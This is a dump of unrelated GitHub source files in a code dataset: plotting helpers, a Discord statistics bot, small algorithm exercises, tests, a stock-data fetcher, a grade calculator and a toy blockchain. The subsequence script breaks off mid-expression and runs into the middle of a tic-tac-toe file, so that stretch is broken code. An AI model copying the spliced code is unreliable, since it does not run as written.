isinstance(color, tuple):\n assert len(color) == 2, \"color has to be a tuple of 2 elements\"\n else:\n raise ValueError(\"color has to be a tuple of 2 elements\")\n \n tlim_ = tlim if tlim is not None else (0, in_content.shape[0])\n xlim_ = xlim if xlim is not None else (1, in_content.shape[1])\n \n t_axis = np.linspace(tlim_[0], tlim_[1], in_content.shape[0])\n x_axis = np.linspace(xlim_[0], xlim_[1], in_content.shape[1])\n \n for idx, x in enumerate(x_axis):\n trace = in_content[:, idx] * gain + x\n ax.fill_betweenx(t_axis, trace, x, where=trace >= x, facecolor=color[0])\n ax.fill_betweenx(t_axis, trace, x, where=trace <= x, facecolor=color[1])\n \n ax.set_ylim(tlim_[0], tlim_[1])\n ax.invert_yaxis()\n\n ax.set_xticks(x_axis)\n ax.tick_params(axis='x', size=2, width=1)\n ax.xaxis.set_label_position('top')\n ax.xaxis.set_ticks_position('top')\n\n ax.grid(b=True, which='major', axis='y')\n\n\ndef plot_gather(gather: np.ndarray, figsize: tuple = (8, 8), cmap: str = 'bone',\n clipval: tuple = None, p: int = 98, tlim: tuple = None, xlim: tuple = None,\n labels: list = ('[s]', '[km]'), filename: str or Path = None) -> plt.figure:\n \n t_label, x_label = labels\n \n if tlim is None:\n t_label = \"samples\"\n tlim = (0, gather.shape[0])\n if xlim is None:\n x_label = \"samples\"\n xlim = (0, gather.shape[1])\n\n # instantiate plots\n plt.figure(figsize=figsize)\n\n plt.imshow(gather, cmap=cmap, aspect='auto',\n clim=clipval if clipval is not None else clim(gather, p),\n extent=[xlim[0], xlim[1], tlim[1], tlim[0]])\n\n 
plt.xlabel(\"x \" + x_label)\n plt.ylabel(\"t \" + t_label)\n\n if filename is not None:\n plt.savefig(filename, bbox_inches='tight', dpi=150)\n plt.show()\n\n\n__all__ = [\n \"clim\",\n \"explode_volume\",\n \"gif_from_array\",\n \"seismograms\",\n \"plot_gather\",\n]\n","repo_name":"polimi-ispl/deep_prior_interpolation","sub_path":"utils/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"15115789161","text":"from discord.ext import commands, tasks\nimport discord\nimport asyncio\nimport os\nfrom helper import RankingDb\nimport json\nfrom datetime import datetime\nimport time\nfrom helper import discord_common\nfrom helper import graph_common as gc\nfrom helper.common import DayFilter\nfrom helper import common\nfrom matplotlib import pyplot as plt\nfrom typing import List\nfrom helper import badge\n\n\nBASE_PROBLEM_URL = 'https://codeforces.com/group/FLVn1Sc504/contest/{0}/problem/{1}'\n\nTAGS = ['Dynamic programming', 'Data structure', 'Geometry', 'Graph', 'Math', 'String', 'Ad-hoc', 'Other']\n\n\ndef _plot_rating(resp, mark='o', labels: List[str] = None, MAX_SCORE=100):\n labels = [''] * len(resp) if labels is None else labels\n\n for user, label in zip(resp, labels):\n ratings, dates = [], []\n for rating, date in user:\n ratings.append(rating)\n dates.append(datetime.strptime(date, \"%Y/%m/%d\"))\n plt.plot(dates,\n ratings,\n linestyle='-',\n marker=mark,\n markersize=3,\n markerfacecolor='white',\n markeredgewidth=0.5,\n label=label)\n\n gc.plot_rating_bg(badge.RATED_RANKS, MAX_SCORE)\n plt.gcf().autofmt_xdate()\n\n\ndef days_between(d1, d2=None):\n if d2 is None:\n d2 = datetime.today()\n d1 = datetime.strptime(d1, \"%Y/%m/%d\")\n return (d2 - d1).days\n\ndef to_message(p):\n # p[0][0] -> name\n # p[0][1] -> links\n # p[0][2] -> cnt_AC\n # p[1] -> result\n # p[2] -> DATE\n links = p[0][1].strip(',').split(',')\n links = list(map(lambda x: BASE_PROBLEM_URL.format(x.split('/')[0], x.split('/')[1]), links))\n msg = \"\"\n if len(links) == 1:\n msg = \"[{0}]({1}) \".format(p[0][0], links[0])\n else:\n msg = \"[{0}]({1}) \".format(p[0][0], links[0])\n for i, link in enumerate(links[1:]):\n msg += \"[link{0}]({1}) \".format(i + 2, link)\n diff = days_between(p[2])\n if diff == 1:\n msg += \"(1 day ago)\"\n elif diff > 1:\n msg += \"({0} days ago)\".format(diff)\n return msg\n\n\nclass Graph(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.tag = {}\n data = json.load(open('database/problem_tag.json'))\n for x in data:\n self.tag[x] = data[x]\n\n @commands.command(brief=\"Biểu đồ các bài đã giải theo tag.\",\n usage='[handle] [d>=[[dd]mm]yyyy] [d<[[dd]mm]yyyy]')\n async def tagbar(self, ctx, *args):\n \"\"\"\n Hiện biểu đồ các bài đã giải theo tag của nick codeforces tương ứng.\n Ví dụ ;voj tagbar CKQ\n \"\"\"\n filt = DayFilter()\n handle = filt.parse(args)\n handle = await common.get_handle(ctx, handle)\n if handle is None:\n return\n #name result date\n problem_list = RankingDb.RankingDb.get_info_solved_problem(handle)\n problem_list = list(filter(lambda x: x[1] >= 100 - 0.1, problem_list))\n problem_list = list(filter(lambda x: filt.filter(datetime.strptime(x[2], '%Y/%m/%d')), problem_list))\n if len(problem_list) == 0:\n await ctx.send('Không tìm thấy submission của `{0}` với các tham số hiện tại.'.format(handle))\n return\n\n cnt = {'No tag' : 0}\n for tag in TAGS:\n cnt[tag] = 0\n for name, *junks in problem_list:\n name = 
name[:name.find('-')].strip()\n tags = []\n if name not in self.tag:\n tags = ['No tag']\n else:\n tags = self.tag[name]\n for tag in tags:\n if tag not in cnt:\n cnt[tag] = 0\n cnt[tag] += 1\n #///\n plt.clf()\n plt.xlabel('Tag')\n plt.ylabel('Number solved')\n x_pos = list(range(len(TAGS)))\n colors = ['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple', 'tab:pink', 'tab:olive', 'tab:cyan']\n plt.bar(x_pos, [cnt[x] for x in TAGS], color=colors)\n plt.xticks(x_pos, TAGS)\n for index, value in enumerate(TAGS):\n if cnt[value] < 10:\n plt.text(index - 0.1, cnt[value], str(cnt[value]))\n elif cnt[value] < 100:\n plt.text(index - 0.15, cnt[value], str(cnt[value]))\n else:\n plt.text(index - 0.25, cnt[value], str(cnt[value]))\n \n total = len(problem_list)\n plt.legend(title=f\"{handle}: {total} ({cnt['No tag']} no tag)\",\n title_fontsize=plt.rcParams['legend.fontsize'])\n plt.gcf().autofmt_xdate()\n discord_file = gc.get_current_figure_as_file()\n embed = discord_common.cf_color_embed(\n title='Số lượng bài giải được trong từng category')\n discord_common.attach_image(embed, discord_file)\n discord_common.set_author_footer(embed, ctx.author)\n await ctx.send(embed=embed, file=discord_file)\n @commands.command(brief=\"Lấy danh sách các bài vừa làm\",\n usage='[handle] [d>=[[dd]mm]yyyy] [d<[[dd]mm]yyyy]')\n async def stalk(self, ctx, *args):\n \"\"\"\n Top 10 bài vừa làm gần nhất.\n Ví dụ ;voj stalk CKQ\n \"\"\"\n filt = DayFilter()\n handle = filt.parse(args)\n handle = await common.get_handle(ctx, handle)\n if handle is None:\n return\n problem_list = RankingDb.RankingDb.get_info_solved_problem(handle)\n problem_list = list(filter(lambda x: x[1] == 'AC' or (float(x[1]) >= 100 - 0.1), problem_list))\n problem_list = list(filter(lambda x: filt.filter(datetime.strptime(x[2], '%Y/%m/%d')), problem_list))\n if len(problem_list) == 0:\n await ctx.send('Không tìm thấy submission của `{0}` với các tham số hiện tại.'.format(handle))\n return\n problem_list = sorted(problem_list, key=lambda x: x[2], reverse=True)[:10]\n problem_list = list(map(lambda x: (RankingDb.RankingDb.get_problem_info(x[0]), x[1], x[2]), problem_list))\n\n msg = ''\n for p in problem_list:\n msg += to_message(p) + '\\n'\n title = \"Các bài vừa được giải bởi \" + handle\n\n embed = discord.Embed(title=title, description=msg)\n await ctx.send(embed=embed)\n\n def get_rating_change(self, handle):\n # problem id, result, date\n raw_subs = RankingDb.RankingDb.get_info_solved_problem(handle)\n raw_subs = list(filter(lambda x: (x[1] == 'AC') or (float(x[1]) > 0.01), raw_subs))\n raw_subs = sorted(raw_subs, key=lambda x: x[2])\n problem_points = common.get_problem_points()\n rating_changes = [(-1, -1)]\n rating = 0\n for problem_name, result, date in raw_subs:\n if rating_changes[-1][1] != date:\n rating_changes.append((0, date))\n if result == 'AC':\n result = 100\n rating += problem_points[problem_name] * float(result) / 100\n # rating += 2 * float(result) / 100\n rating_changes[-1] = (rating, date)\n return rating_changes[1:]\n\n @commands.command(brief=\"Hiện phân phối điểm\")\n async def distrib(self, ctx):\n \"\"\"\n Hiện phân phối điểm của các bài tập.\n \"\"\"\n bin_size = 0.2\n bins = 10\n\n height = [0] * bins\n problem_points = common.get_problem_points()\n for p, point in problem_points.items():\n height[min(bins - 1, int(point // bin_size))] += 1\n x = [k * bin_size for k in range(bins)]\n label = ['{:.2f} ({})'.format(r, c) for r,c in zip(x, height)]\n colors = []\n for rank in badge.RATED_RANKS:\n 
colors.append('#' + '%06x' % rank.color_embed)\n colors = colors[:bins]\n assert len(colors) > 0, 'Expected colors len is greater than 0'\n while len(colors) < bins:\n colors.append(colors[-1])\n \n plt.clf()\n plt.xlabel('Point')\n plt.ylabel('Number of problems')\n plt.xticks(rotation=45)\n plt.bar(x, height, bin_size*0.9, color=colors, tick_label=label)\n discord_file = gc.get_current_figure_as_file()\n embed = discord_common.cf_color_embed(\n title=\"Phân phối điểm của bài tập VOJ\")\n discord_common.attach_image(embed, discord_file)\n # discord_common.set_author_footer(embed, ctx.author)\n await ctx.send(embed=embed, file=discord_file)\n @commands.command(brief=\"Hiện historgram về thời gian làm bài\",\n usage='[handle] [d>=[[dd]mm]yyyy] [d<[[dd]mm]yyyy]')\n async def hist(self, ctx, *args):\n \"\"\"Hiện histogram về thời gian làm bài của handle cho trước.\n Ví dụ ;voj hist CKQ d<16022020 d>=05062019\n \"\"\"\n filt = DayFilter()\n handle = filt.parse(args)\n handle = await common.get_handle(ctx, handle)\n if handle is None:\n return\n raw_subs = RankingDb.RankingDb.get_info_solved_problem(handle)\n raw_subs = list(filter(lambda x: filt.filter(\n datetime.strptime(x[2], '%Y/%m/%d')), raw_subs))\n if len(raw_subs) == 0:\n await ctx.send('Không tìm thấy submission của `{0}` với các tham số hiện tại.'.format(handle))\n return\n subs = []\n types = ['AC', 'IC', 'PC']\n solved_by_type = {'AC': [], 'IC': [], 'PC': []}\n cnt = 0\n plt.clf()\n plt.xlabel('Time')\n plt.ylabel('Number solved')\n for problem_name, point, date in raw_subs:\n t = 'AC'\n if point <= 0 + 0.01:\n t = 'IC'\n elif point < 100 - 0.01:\n t = 'PC'\n solved_by_type[t].append(date)\n\n all_times = [[datetime.strptime(date, '%Y/%m/%d')\n for date in solved_by_type[t]] for t in types]\n labels = ['Accepted', 'Incorrect', 'Partial Result']\n colors = ['g', 'r', 'y']\n plt.hist(all_times, stacked=True, label=labels, bins=34, color=colors)\n total = sum(map(len, all_times))\n plt.legend(title=f'{handle}: {total}',\n title_fontsize=plt.rcParams['legend.fontsize'])\n\n plt.gcf().autofmt_xdate()\n discord_file = gc.get_current_figure_as_file()\n embed = discord_common.cf_color_embed(\n title='Số bài làm theo thời gian.')\n discord_common.attach_image(embed, discord_file)\n discord_common.set_author_footer(embed, ctx.author)\n await ctx.send(embed=embed, file=discord_file)\n\n @commands.command(brief=\"Hiện histogram của toàn group.\",\n usage='[d>=[[dd]mm]yyyy] [d<[[dd]mm]yyyy]')\n async def group_hist(self, ctx, *args):\n \"\"\"Hiện histogram của toàn group.\n Ví dụ ;voj group_hist d<16022020 d>=05062019\n \"\"\"\n filt = DayFilter()\n handle = filt.parse(args)\n\n solved_info = RankingDb.RankingDb.get_table(RankingDb.SUBMISSION_TABLE)\n raw_subs = list(map(lambda x: (x['problemName'], x['point'], x['timestamp']), solved_info))\n\n raw_subs = list(filter(lambda x: filt.filter(datetime.fromtimestamp(x[2])), raw_subs))\n if len(raw_subs) == 0:\n await ctx.send('Không tìm thấy submission với các tham số hiện tại.')\n return\n subs = []\n types = ['AC', 'IC', 'PC']\n solved_by_type = {'AC': [], 'IC': [], 'PC': []}\n cnt = 0\n plt.clf()\n plt.xlabel('Time')\n plt.ylabel('Number solved')\n for problem_name, point, timestamp in raw_subs:\n t = 'AC'\n if point <= 0 + 0.01:\n t = 'IC'\n elif point < 100 - 0.01:\n t = 'PC'\n solved_by_type[t].append(datetime.fromtimestamp(timestamp))\n\n all_times = [[date for date in solved_by_type[t]] for t in types]\n labels = ['Accepted', 'Incorrect', 'Partial Result']\n colors = ['g', 'r', 'y']\n 
plt.hist(all_times, stacked=True, label=labels, bins=34, color=colors)\n total = sum(map(len, all_times))\n plt.legend(\n title=f'VNOI Group: {total}', title_fontsize=plt.rcParams['legend.fontsize'])\n\n plt.gcf().autofmt_xdate()\n discord_file = gc.get_current_figure_as_file()\n embed = discord_common.cf_color_embed(\n title='Số bài làm theo thời gian.')\n discord_common.attach_image(embed, discord_file)\n discord_common.set_author_footer(embed, ctx.author)\n await ctx.send(embed=embed, file=discord_file)\n\n @commands.command(brief=\"Hiện biểu đồ kinh nghiệm\",\n usage='[handle] [d>=[[dd]mm]yyyy] [d<[[dd]mm]yyyy]')\n async def exp(self, ctx, *args):\n \"\"\"\n Hiện biểu đồ kinh nghiệm của handle cho trước.\n Ví dụ ;voj exp CKQ d<16022020 d>=05062019\n \"\"\"\n filt = DayFilter()\n handle = filt.parse(args)\n handle = await common.get_handle(ctx, handle)\n if handle is None:\n return\n if badge.MAX_SCORE == None:\n await ctx.send('Ranking chưa được tính, ping Cá Nóc.')\n return\n resp = self.get_rating_change(handle)\n resp = list(filter(lambda x: filt.filter(\n datetime.strptime(x[1], '%Y/%m/%d')), resp))\n if len(resp) == 0:\n await ctx.send('Không tìm thấy submission của `{0}` với các tham số hiện tại.'.format(handle))\n return\n plt.clf()\n _plot_rating([resp], MAX_SCORE=badge.MAX_SCORE)\n current_rating = resp[-1][0]\n current_badge = badge.point2rank(current_rating, badge.MAX_SCORE)\n rank_title = current_badge.title + \" {:.3f}\".format(current_rating)\n labels = [f'\\N{ZERO WIDTH SPACE}{handle} ({rank_title})']\n plt.legend(labels, loc='upper left')\n min_rating = current_rating\n max_rating = current_rating\n for rating, date in resp:\n min_rating = min(min_rating, rating)\n max_rating = max(max_rating, rating)\n max_rating = max(max_rating + 0.5 * badge.MAX_SCORE / 100, min(100, current_badge.high + 0.1) * badge.MAX_SCORE / 100)\n min_rating -= 0.5 * badge.MAX_SCORE / 100\n if min_rating < 0:\n min_rating = 0\n plt.ylim(min_rating, max_rating)\n msg = \"\"\n if current_badge.high < 100:\n upper_bound = current_badge.high * badge.MAX_SCORE / 100\n nxt_badge = badge.point2rank(upper_bound + 0.0001, MAX_SCORE=badge.MAX_SCORE)\n msg = \"`{}` cần khoảng {:.2f} exp nữa để có badge {} <:orz:661153248186597386>\".format(\n handle, upper_bound - current_rating, nxt_badge.title\n )\n discord_file = gc.get_current_figure_as_file()\n embed = discord_common.cf_color_embed(\n title='Biểu đồ kinh nghiệm trong group VNOI.')\n discord_common.attach_image(embed, discord_file)\n discord_common.set_author_footer(embed, ctx.author)\n await ctx.send(msg, embed=embed, file=discord_file)\n\ndef setup(bot):\n bot.add_cog(Graph(bot))\n","repo_name":"leduythuccs/VOJ-ranking-bot","sub_path":"cogs/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":15224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26945104509","text":"import sys\nimport pandas as pd\nimport numpy as np\n\ndef read_file():\n try:\n file_content = pd.read_csv(sys.argv[1], header=None)\n except:\n sys.exit(\"file doesn't exist\")\n nb_thetas = file_content.shape[0]\n tmp = file_content.iloc[0 : nb_thetas, :]\n to_ret = np.array(tmp.values, dtype=float)\n return (to_ret, nb_thetas)\n\ndef main():\n thetas, nb_thetas = read_file()\n if ((len(sys.argv) - 1) < nb_thetas):\n sys.exit(\"need more features\")\n result = thetas[0][0]\n i = 1\n while (i < nb_thetas):\n result += thetas[i][0] * float(sys.argv[(i + 1)])\n i += 1\n print(result)\n\nif __name__ == 
\"__main__\":\n\tmain()\n","repo_name":"msukhare/linear_reg_normal_equation","sub_path":"appli_linear_reg.py","file_name":"appli_linear_reg.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22455107153","text":"N = int(input())\n\nn_list=list(map(int, input().split()))\n\nleft = [1 for i in range(N)]\nright = [1 for i in range(N)]\n\ndef find():\n for i in range(N):\n for j in range(i):\n if n_list[i] > n_list[j] and left[i] < left[j]+1:\n left[i] = left[j] + 1\n if n_list[N-1-i] > n_list[N-1-j] and right[N-1-i] < right[N-1-j]+1:\n right[N-1-i] = right[N-1-j]+1\n\nfind()\nl_max = max(left)\nindex = left.index(l_max)\n\nif index == N-1:\n print(l_max)\nelif l_max == 0:\n print(max(right))\nelse:\n r_max = 0\n for i in right[index+1:]:\n if r_max < i and i 3:\n print(\"Inputed row is not valid, must be 1 - 3\")\n break\n if col < 1 or col > 3:\n print(\"Inputed column is not valid, must be 1 - 3\")\n break\n\n #fixing the spot\n self.fix_spot(row - 1, col - 1, player)\n\n # checking whether current player has won or not\n if self.is_player_win(player):\n print(f\"Player {player} wins the game!\")\n break\n\n # checking whether the game is draw or not\n if self.is_board_filled():\n print(\"Match Draw!\")\n break\n\n #swap turns\n player = self.swap_player_turn(player)\n \n # show final view\n print()\n self.show_board\n\n# start the game\ntic_tac_toe = TicTacToe()\ntic_tac_toe.start()\n","repo_name":"aqtlol/tictactoe","sub_path":"src/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13034966601","text":"import os\nimport pytest\n\nfrom multiplexer import multiplex_files\n\n\ndef write_file(tmp_path, filename, content):\n filename = os.path.join(tmp_path, filename)\n with open(filename, 'w') as file:\n for line in content:\n file.write(line + '\\n')\n return filename\n\n\n@pytest.fixture\ndef file_with_numbers(tmp_path):\n filename = 'file_with_numbers'\n content = ['1', '2', '3']\n return write_file(tmp_path, filename, content)\n\n\n@pytest.fixture\ndef file_with_letters(tmp_path):\n filename = 'file_with_letters'\n content = ['A', 'B', 'C', 'D']\n return write_file(tmp_path, filename, content)\n\n\n@pytest.fixture\ndef file_with_symbols(tmp_path):\n filename = 'file_with_symbols'\n content = ['-', '+']\n return write_file(tmp_path, filename, content)\n\n\n@pytest.fixture\ndef file_with_one_line(tmp_path):\n filename = 'file_with_one_line'\n content = ['line', ]\n return write_file(tmp_path, filename, content)\n\n\n@pytest.fixture\ndef empty_file(tmp_path):\n filename = 'empty_file'\n content = ['', ]\n return write_file(tmp_path, filename, content)\n\n\n@pytest.fixture\ndef file_with_empty_lines(tmp_path):\n filename = 'file_with_empty_lines'\n content = ['', 'line1', '', 'line2']\n return write_file(tmp_path, filename, content)\n\n\ndef test_one_file(file_with_letters):\n filenames = [file_with_letters, ]\n generator = multiplex_files(filenames, infinite=False, loops=5)\n extracted_values = [[i for i in j] for j in generator]\n assert extracted_values == [['A'], ['B'], ['C'], ['D'], ['A']]\n\n\ndef test_multiple_files(file_with_numbers, file_with_letters, file_with_symbols):\n filenames = [file_with_numbers, file_with_letters, file_with_symbols]\n generator = multiplex_files(filenames, infinite=False, loops=5)\n extracted_values = [[i for i in j] 
for j in generator]\n    assert extracted_values == [['1', 'A', '-'], ['2', 'B', '+'], ['3', 'C', '-'], ['1', 'D', '+'], ['2', 'A', '-']]\n\n\ndef test_file_with_one_line(file_with_one_line):\n    filenames = [file_with_one_line, ]\n    generator = multiplex_files(filenames, infinite=False, loops=5)\n    extracted_values = [[i for i in j] for j in generator]\n    assert extracted_values == [['line'], ['line'], ['line'], ['line'], ['line']]\n\n\ndef test_file_with_empty_lines(file_with_empty_lines):\n    filenames = [file_with_empty_lines, ]\n    generator = multiplex_files(filenames, infinite=False, loops=5)\n    extracted_values = [[i for i in j] for j in generator]\n    assert extracted_values == [[''], ['line1'], [''], ['line2'], ['']]\n\n\ndef test_empty_file(empty_file):\n    filenames = [empty_file, ]\n    generator = multiplex_files(filenames, infinite=False, loops=5)\n    extracted_values = [[i for i in j] for j in generator]\n    assert extracted_values == [[''], [''], [''], [''], ['']]\n\n\ndef test_loops_number(file_with_one_line):\n    filenames = [file_with_one_line, ]\n    generator = multiplex_files(filenames, infinite=False, loops=10)\n    extracted_values = [[i for i in j] for j in generator]\n    assert extracted_values == [['line']] * 10\n\n\ndef test_no_file():\n    filenames = ['file_not_exists', ]\n    with pytest.raises(FileNotFoundError):\n        generator = multiplex_files(filenames, infinite=False, loops=10)\n        extracted_values = [[i for i in j] for j in generator]\n","repo_name":"avasenin-148/intel","sub_path":"task_1/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71260063529","text":"from financialNews.utils import util\n\ndef ashare_params(code):\n    \"\"\"Eastmoney (东方财富) request parameters\"\"\"\n    tmp = \"1.\" + code\n    prms = {\n        \"secid\": tmp,\n        \"ut\": \"fa5fd1943c7b386f172d6893dbfba10b\",\n        \"fields1\": \"f1,f2,f3,f4,f5,f6\",\n        \"fields2\": \"f51,f52,f53,f54,f55,f56,f57,f58,f59,f60,f61\",\n        # \"klt\": \"102\",\n        \"klt\": \"101\",\n        'fqt': \"1\",\n        \"end\": \"20500101\",\n        'lmt': \"120\",\n    }\n    result = \"\"\n    for key, val in prms.items():\n        result = result + key + \"=\" + val + \"&\"\n    result = result[:-1]\n    return result\n\ndef collect_ashare(code):\n    server = \"http://3.push2his.eastmoney.com/api/qt/stock/kline/get\"\n    params = ashare_params(code)\n    url = server + \"?\" + params\n    response = util.get_url(url)\n    kline_data = response[\"data\"][\"klines\"]\n\n    all_data = []\n    for node in kline_data:\n        arr = node.split(\",\")\n        #all_data.append(arr[0:6])\n        all_data.append([arr[0], arr[1], arr[3], arr[4], arr[2]])\n    return all_data\n\nif __name__ == \"__main__\":\n    code = \"000016\"\n    ret = collect_ashare(code)\n    print(ret)","repo_name":"leeewl/financialNews","sub_path":"financialNews/core/finance/eastmoney.py","file_name":"eastmoney.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30448673592","text":"\"\"\"\nA nota final de um estudante é calculada a partir de três notas atribuídas entre o intervalo de 0 até 10, respectivamente,\na um trabalho de laboratório, a uma avaliação semestral e a um exame final. A média das três notas mencionadas anteriormente\nobedece aos pesos: Trabalho de Laboratório: 2; Avaliação Semestral: 3, Exame Final : 5. De acordo com o resultado, mostre na\ntela se o aluno está reprovado (média entre 0 a 2,9 ) de recuperação (3 entre 4,9) ou se foi aprovado. 
Faça todas as veri-\nficações necessárias.\n\"\"\"\n\nwhile True:\n grade = input(\"Digite a nota do exame final : \")\n work_school = input(\"Digite a nota do trabalho : \")\n semiannual_evaluation = input(\"Digite a nota do exame semestral : \")\n try:\n grade = float(grade); work_school = float(work_school); semiannual_evaluation = float(semiannual_evaluation)\n except:\n print(\"Digito inválido.\")\n finally:\n if grade < 0 or grade > 10:\n print(\"Nota do exame final deve estar entre 0 e 10.\")\n elif work_school < 0 or work_school > 10:\n print(\"Nota do trabalho deve estar entre 0 e 10.\")\n elif semiannual_evaluation < 0 or semiannual_evaluation > 10:\n print(\"Nota do exame semestral deve estar entre 0 e 10.\")\n else:\n weighted_average = ((grade * 5 ) + (work_school * 2) + (semiannual_evaluation * 3)) / 10\n if weighted_average > 0 and weighted_average <= 2.9:\n print(f'Média {weighted_average}, aluno está reprovado.')\n elif weighted_average >= 3 and weighted_average <= 4.9:\n print(f'Média {weighted_average}, aluno está recuperação.')\n else:\n print(f'Média {weighted_average}, aluno está Aprovado.')\n print(\"Deu certo\")\n ","repo_name":"linikerunk/python-as-well","sub_path":"geek-universe/GeekExercise/Section 5/exe14.py","file_name":"exe14.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6571015025","text":"from unittest import TestCase\n\nfrom util.asynchttppost import AsyncHttpPost\n\n\nclass TestAsyncHttpPost(TestCase):\n def test_post(self):\n try:\n in_file = \"../../data/requests/Mixed-modalities.json\"\n\n url = \"http://127.0.0.1:8080/geminiml/predict\"\n headers = {'Content-type': 'application/json'}\n async_http_post = AsyncHttpPost(url, headers)\n responses = async_http_post.post_batch(in_file)\n print(str(responses))\n except Exception as e:\n print(str(e))\n self.fail()\n","repo_name":"patrick-nicolas/GenModels","sub_path":"src/util/test/test_asynchttppost.py","file_name":"test_asynchttppost.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29802774899","text":"import hashlib\n\nfrom proof import proof\nfrom transaction.transaction import Transaction\nfrom transaction import signature\n\n\nWORK_FACTOR = 5\nSEED_COIN_SUPPLY = 21000000\n\n\n\nclass Blockchain(object):\n\n def __init__(self, transactions=None):\n \"\"\"Creates blockchain from given seed transactions\"\"\"\n\n self.blocks = []\n if transactions:\n if type(transactions) is not list:\n raise Exception(\"Data must be a list of transactions!\")\n\n for i, tx in enumerate(transactions):\n if i == 0: # Create genesis block\n if not signature.verify(tx.from_pk, tx.to_string_for_hashing(), tx.signature):\n print(\"Genesis transaction signature is NOT valid.\")\n return\n prev_hash = \"0\" # Arbitrary prev_hash for genesis block\n new_block = Block.create_from_transaction(tx, prev_hash)\n self.blocks.append(new_block)\n else:\n if not self.validate_transaction(tx):\n print(\"Transaction is NOT valid.\")\n return\n new_block = Block.create_from_transaction(tx, self.blocks[-1].header_hash)\n self.validate_and_add_block(new_block)\n\n def init_with_genesis_block(self, block):\n \"\"\"Creates blockchain from a Genesis block.\"\"\"\n\n genesis_tx = block.transactions # Genesis block contains single seed transaction from God\n\n if not signature.verify(genesis_tx.from_pk, 
genesis_tx.to_string_for_hashing(), genesis_tx.signature):\n print(\"Genesis transaction signature is NOT valid.\")\n return\n\n self.blocks.append(block)\n return self\n\n def add_transactions(self, transactions):\n \"\"\"Mines a new block that includes a set of given transaction(s).\"\"\"\n\n if not transactions:\n Exception(\"transactions cannot be empty!\")\n return\n\n if not type(transactions) == list:\n Exception(\"Transactions must be a sent in a list!\")\n return\n\n for i, tx in enumerate(transactions):\n if not self.validate_transaction(tx):\n return\n new_block = Block.create_from_transaction(tx, self.blocks[-1].header_hash)\n self.validate_and_add_block(new_block)\n\n def validate_and_add_block(self, block):\n \"\"\"Validates a block before adding to current chain.\"\"\"\n\n # 1. Validate transaction(s) in block\n tx = block.transactions\n if not self.validate_transaction(tx):\n print(\"Block contains invalid transactions.\")\n return\n\n # 2. Hash transaction(s)\n tx_hash = HashAssist.hash_value(value=tx.to_string_for_hashing())\n\n # 3. Validate header\n header_string = block.prev_hash + tx_hash + block.nonce\n header_hash = HashAssist.hash_value(header_string)\n if not block.header_hash == header_hash:\n print(\"Block header invalid!\")\n return\n\n self.blocks.append(block)\n\n def validate_transaction(self, tx, throw_exception=False):\n \"\"\"Validates a transaction's signature & amount\"\"\"\n\n # 1. Validate signature\n isValid = signature.verify(tx.from_pk, tx.to_string_for_hashing(), tx.signature)\n if not isValid:\n error_msg = \"Signature not valid!\"\n if throw_exception:\n print(error_msg)\n raise Exception(error_msg)\n else:\n print(error_msg)\n return False\n\n # 2. Validate sender balance\n balance = get_balance(tx.from_pk, self.blocks)\n if tx.amount > balance:\n error_msg = \"Insufficient funds for this transaction!\"\n if throw_exception:\n print(error_msg)\n raise Exception(error_msg)\n else:\n print(error_msg)\n return False\n return True\n\n def get_size(self):\n return len(self.blocks)\n\n def print_all_blocks(self):\n for block in self.blocks:\n block.print_block()\n\n def remove_data(self, data):\n raise Exception(\"This is the blockchain. 
No data shall be removed.\")\n\n\n\nclass Block(object):\n def __init__(self, header_hash, prev_hash, nonce, transactions_hash, transactions):\n self.header_hash = header_hash\n self.prev_hash = prev_hash\n self.nonce = nonce\n self.transactions_hash = transactions_hash\n self.transactions = transactions\n \n @staticmethod\n def create_from_transaction(tx, prev_hash):\n \"\"\"Creates and returns a new Block given a transaction.\"\"\"\n\n tx_hash = HashAssist.hash_value(tx.to_string_for_hashing())\n\n print(\"Mining nonce....\")\n nonce = proof.mint(prev_hash + tx_hash, WORK_FACTOR)\n header_hash = HashAssist.hash_value(prev_hash + tx_hash + nonce)\n\n return Block(header_hash, prev_hash, nonce, tx_hash, tx)\n\n def print_block(self):\n print(\"Block details....\")\n print(\"header_hash: %s\" % self.header_hash)\n print(\"prev_hash: %s\" % self.prev_hash)\n print(\"nonce: %s\" % self.nonce)\n print(\"transactions_hash: %s\" % self.transactions_hash)\n print(\"transactions: %s\" % self.transactions)\n print(\"_______________________________\")\n\n\n\nclass HashAssist(object):\n # TODO: Add any additional Hash assist functionality\n\n @classmethod\n def hash_value(self, value):\n h = hashlib.sha256()\n h.update(value.encode('utf-8'))\n return h.hexdigest()\n\ndef get_balance(pub_key, blocks):\n \"\"\"Returns unspent transaction balance for a given public key.\"\"\"\n \n balance = 0\n for block in blocks:\n if block.transactions.to_pk == pub_key:\n balance += block.transactions.amount\n if block.transactions.from_pk == pub_key:\n balance -= block.transactions.amount\n return balance\n\ndef validate_all_transactions_and_blocks(blockchain):\n \"\"\"Validates all transactions and blocks in a chain\"\"\"\n\n # 1. Recreate blockchain from scratch...\n new_blockchain = None\n\n # 2. 
